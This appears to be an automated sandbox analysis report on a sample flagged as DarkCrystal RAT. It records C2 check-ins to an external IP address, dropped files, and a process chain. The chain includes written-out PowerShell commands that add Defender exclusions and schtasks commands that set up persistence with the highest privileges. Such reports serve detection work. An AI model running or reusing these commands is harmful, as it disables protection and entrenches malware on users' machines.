                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0046C220
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0047B348 FindFirstFileExA,0_2_0047B348
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49977 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49979 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 37.44.238.250:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49978 -> 37.44.238.250:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: WinPerfcommon.exe, 00000006.00000002.2427021597.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00456FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00456FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045848E0_2_0045848E
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004540FE0_2_004540FE
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004640880_2_00464088
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004600B70_2_004600B7
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004671530_2_00467153
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004751C90_2_004751C9
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004662CA0_2_004662CA
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004532F70_2_004532F7
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004643BF0_2_004643BF
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0047D4400_2_0047D440
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045F4610_2_0045F461
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045C4260_2_0045C426
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004677EF0_2_004677EF
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045286B0_2_0045286B
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0047D8EE0_2_0047D8EE
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_004819F40_2_004819F4
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045E9B70_2_0045E9B7
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00466CDC0_2_00466CDC
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00463E0B0_2_00463E0B
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0045EFE20_2_0045EFE2
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00474F9A0_2_00474F9A
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF848F40D486_2_00007FF848F40D48
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF848F40E436_2_00007FF848F40E43
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF8493505756_2_00007FF849350575
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                    Source: C:\Users\user\Desktop\top.exeCode function: String function: 0046EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\top.exeCode function: String function: 0046F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\top.exeCode function: String function: 0046EB78 appears 39 times
                                    Source: kTYwyifI.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: alFgOGaa.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: SHwrfMKt.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: Qxaqfufs.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: GOHavRZK.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: qMBWbOkw.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ZndYtGLf.log.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: top.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs top.exe
                                    Source: top.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: WinPerfcommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SystemSettings.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe0.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: WmiPrvSE.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: OfficeClickToRun.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@52/63@0/0
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_00456C74 GetLastError,FormatMessageW,0_2_00456C74
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0046A6C2
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\ZndYtGLf.logJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-nQmtb0EsMA9tAW54k3K0
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\AppData\Local\Temp\04s13a00Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
                                    Source: C:\Users\user\Desktop\top.exeCommand line argument: sfxname0_2_0046DF1E
                                    Source: C:\Users\user\Desktop\top.exeCommand line argument: sfxstime0_2_0046DF1E
                                    Source: C:\Users\user\Desktop\top.exeCommand line argument: STARTDLG0_2_0046DF1E
                                    Source: C:\Users\user\Desktop\top.exeCommand line argument: xzJ0_2_0046DF1E
                                    Source: top.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: top.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\top.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: top.exeVirustotal: Detection: 56%
                                    Source: top.exeReversingLabs: Detection: 57%
                                    Source: C:\Users\user\Desktop\top.exeFile read: C:\Users\user\Desktop\top.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\top.exe "C:\Users\user\Desktop\top.exe"
                                    Source: C:\Users\user\Desktop\top.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe "C:\msproviderBrokerMonitornet/WinPerfcommon.exe"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                    Source: unknownProcess created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                    Source: unknownProcess created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\top.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe "C:\msproviderBrokerMonitornet/WinPerfcommon.exe"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'Jump to behavior
